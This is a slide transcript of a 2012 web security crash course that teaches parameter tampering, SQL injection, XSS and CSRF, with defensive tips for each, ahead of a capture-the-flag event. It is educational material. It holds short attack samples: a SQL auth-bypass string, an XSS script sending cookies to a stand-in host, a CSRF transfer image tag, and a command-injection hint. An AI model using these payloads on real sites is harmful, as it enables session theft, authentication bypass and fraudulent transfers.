TexSAW 2012 Web Security Crash Course
description
Transcript of TexSAW 2012 Web Security Crash Course
![Page 1: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/1.jpg)
TEXSAW 2012WEB SECURITY CRASH COURSETexSAW 2012Scott Hand
![Page 2: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/2.jpg)
Introduction
![Page 3: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/3.jpg)
Recommended Tools Web browser – Firefox is recommended
because of TamperData, Live HTTP Headers, etc.
Knowing Python helps Very little else is needed, Backtrack
Linux is useful for many automated tools
![Page 4: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/4.jpg)
What We’re Targeting Web Applications
Web Pages (HTML, PHP, etc.) Databases
Goal Steal data Gain access to system Bypass authentication blocks
![Page 5: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/5.jpg)
Background
![Page 6: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/6.jpg)
Web Servers Web applications are really just an interface
for accessing a web server Example Web Servers:
Apache IIS Nginx Self-contained servers for one application – Ruby
on Rails, Django, Sinatra, node.js, etc. Some servers like Apache resemble navigating
a file system, others use RESTful routing
![Page 7: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/7.jpg)
HTTP HTTP is the means of communication It is stateless
We get around this by using sessions Sessions are stored in browser cookies Side effect – If we steal someone’s cookies,
the web server will think we are the same user
![Page 8: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/8.jpg)
HTTP Requests Web traffic involves a Request and a
Response GET and POST are two main request
methods GET is for an action intended to ask the
server for information POST is for an action intended to tell the
server to do something Examples: GET used for showing your
profile on a web site, POST used to update your profile information
![Page 9: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/9.jpg)
HTTP Request Parameters Along with the URL and request method,
HTTP requests can also carry parameters GET parameters
Visible from the url:http://www.url.com/page.php?arg1=a&arg2=b
Can be embedded easily in links POST parameters are not visible from
the URL and not easily embedded in links, however they can easily be altered
![Page 10: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/10.jpg)
Example Scenario
![Page 11: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/11.jpg)
Example Exchange for a Bank SiteViewing Homepage
User Web ServerGET
GET: index.php
INDEX
Database
![Page 12: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/12.jpg)
Example Exchange for a Bank SiteLogging In
POST
POST: login.phpParameters: username,
password
Redirectto
account
Auth
OK
User Web Server Database
SET UP SESSION
![Page 13: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/13.jpg)
Example Exchange for a Bank SiteTransferring Some Money
POST
POST: transfer.phpParameters: to, amount
Redirectto
account
Make changes
OK
User Web Server Database
![Page 14: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/14.jpg)
Parameter Tampering
![Page 15: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/15.jpg)
Tools TamperData – Extension for Firefox
Can intercept and modify requests Pretty powerful but can be tedious to use
repeatedly Live HTTP Headers – Extension for Firefox
Good for monitoring and replaying requests Fast and good as long as replaying traffic works
Burp Suite Separate program, works through proxy – browser
agnostic Can do just about everything
![Page 16: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/16.jpg)
Example Attack
POST
POST: transfer.phpParameters: to, amount
Redirectto
account
Make changes
OK
User Web Server Database
![Page 17: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/17.jpg)
Parameter Tampering Example of real-life attack – PayPal was used by
vendors to handle transactions. They trust PayPal and PayPal trusts them. They trust that once they send the transaction to
PayPal, it will be resolved and they can send the product when the transaction is complete
PayPal trusts that the information sent to them by the vendor, through the users’ browser (!!!), is correct
If we change the amount we pay to something small, neither party knows and we get the product for nothing
![Page 18: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/18.jpg)
DEMO
![Page 19: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/19.jpg)
Tips for Securing Don’t trust requests by themselves! Many frameworks will sign requests that
they send to prevent tampering Thinking that users can’t alter POST data
because they can’t see it in their address bar is just weak security through obscurity
![Page 20: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/20.jpg)
SQL Injections
![Page 21: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/21.jpg)
Overview SQL injection is part of a class of attacks in
which we abuse poor programming to embed user-controlled data in trusted code run by the server
Vulnerable code consists of SQL queries being built using string concatenation or interpolation with user tainted variables:$query = “SELECT * from users ”
. “WHERE username = ‘” . $username
. “’ AND password = ‘” . $password . “’”;
![Page 22: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/22.jpg)
Example Attack
POST
POST: login.phpLets look at the SQL and the
attack...
Redirectto
account
Auth
OK
User Web Server Database
![Page 23: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/23.jpg)
Behind the Scenes for login.php $query = “SELECT * from users ”
. “WHERE username = ‘” . $username
. “’ AND password = ‘” . $password . “’”;
Examine the result to see if the user is selected.
Sample normal query after input:SELECT * from users WHERE name=‘user’ AND password=‘password’
Sample attack password: ’ OR ‘1’=‘1 Resulting query:
SELECT * from users WHERE name=‘user’ AND password=‘’ OR ‘1’=‘1’
Always returns true, bypasses authentication
![Page 24: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/24.jpg)
Other Types of Attacks Can add INSERTS, UPDATES, etc. if multiple
queries are supported Blind SQL Injection
Needed when the results of a query are not displayed or even acknowledged
Use side channel attacks – sleep for a certain amount of time if the first character of password is ‘a’, repeat for each letter until a match is found then repeat for each character in password
sqlmap works wonders to help automate this
![Page 25: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/25.jpg)
DEMO
![Page 26: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/26.jpg)
Tips for Securing USE PREPARED STATEMENTS Don’t plug user input into queries Don’t escape user tainted queries SERIOUSLY USE PREPARED STATEMENTS THEY’RE NOT EVEN HARD TO USE
![Page 27: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/27.jpg)
Cross Site Scripting (XSS)
![Page 28: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/28.jpg)
Overview Basic idea is to exploit the trust that
your browser places in the website it’s viewing
Embed malicious code in the webpage and your browser will execute it
Two Types: Reflected – Client-side. In request
parameters or URL. Requires that a user click the malicious link or form.
Stored – Server-side. Embedded in a web page and hits every visitor that views the page.
![Page 29: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/29.jpg)
Some Goals Steal cookies
Since JavaScript can access cookies, you can send the victim’s cookies to yourself:<script>$.get(‘www.badurl.com/?cookie=’ + document.cookie);<script>
Mimic real user behavior Fill out and submit forms Open IFRAMEs to maintain access Redirect to other pages
![Page 30: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/30.jpg)
Example Exchange for a Bank SiteViewing Homepage
User Web ServerGET
GET: index.php
INDEX
DatabaseInfect
Bad GuySessio
n
![Page 31: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/31.jpg)
DEMO
![Page 32: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/32.jpg)
Tips for Securing Developers
Never, ever allow unauthorized users the ability to embed HTML into your page.
Escape every single bit of user input you get, it’s all dangerous
Users Use NoScript or similar plugin Don’t click a link with a bunch of JavaScript
in the URL
![Page 33: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/33.jpg)
Cross Site Request Forgery (CSRF)
![Page 34: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/34.jpg)
Overview Exploit the trust that the web server
places in the victim’s browser It’s difficult for a site to distinguish
between legitimate requests and requests that an attacker caused
Not the same as XSS (which exploits browser’s trust in site), but plays very well with XSS – CSRF is often made more deadly by XSS
![Page 35: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/35.jpg)
Example Exchange for a Bank SiteTransferring Some Money
POST
POST: transfer.phpParameters: to=BAD GUY,
1000000
Redirectto
account
Make changes
OK
User Web Server DatabaseBad Guy
![Page 36: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/36.jpg)
Ways to Trigger An image:
<img src=“http://www.bank.com/transfer?to=1337&amount=1000000” />
XSS:$.get(‘./profile.php’, function(data) { // evil });
![Page 37: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/37.jpg)
DEMO
![Page 38: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/38.jpg)
Tips for Securing Only trust requests from your site Use CSRF-protection tokens – one time
tokens for forms – included in most web frameworks
Don’t make things like bank transfers or log outs a GET request, that just makes life easier for attackers
Not much you can do as a user
![Page 39: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/39.jpg)
General Tips
![Page 40: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/40.jpg)
Look at Requests! Use TamperData, firebug, Chrome
Developer Tools, Live HTTP Headers, etc. Look closely at things that you can
tamper to change the behavior of the application – sometimes the developer trusted that data and nothing will stop you
![Page 41: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/41.jpg)
Inject Everything If you think it’s using your data in SQL,
try some SQL injection If you think it’s using embedding your
data in a program call (`ping $address`) then inject via things like &&
If you think it’s running HTML, throw in some JavaScript
![Page 42: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/42.jpg)
Situational Awareness Pay close attention to what kind of web server
you’re dealing with Some web servers or web frameworks are more
susceptible than others to certain attacks For example, many web frameworks are good at
preventing HTML injection, but tend to trust HTTP requests too much
Keep an eye out for home brewed stuff – whether it be crypto, injection escaping, web servers, etc. – it’s probably not as well vetted against malicious input
![Page 43: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/43.jpg)
JavaScript – It does a lot If you have jQuery on your website, use
it! You can issue requests and parse the
results with $.get() and $.post(). These are so helpful for enhancing XSS attacks (example: do a GET to a user’s profile page, pull their info from the form, POST it to your page)
It gives you tools for shorter JavaScript payloads, especially handy when space is critical
Pretty much anything on the user’s end can be scripted and altered
![Page 44: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/44.jpg)
Any questions?
![Page 45: TexSAW 2012 Web Security Crash Course](https://reader035.fdocuments.in/reader035/viewer/2022062218/568164da550346895dd72b32/html5/thumbnails/45.jpg)
That’s all, CTF Time! Presented by Scott Hand
(utdallas.edu/~shand)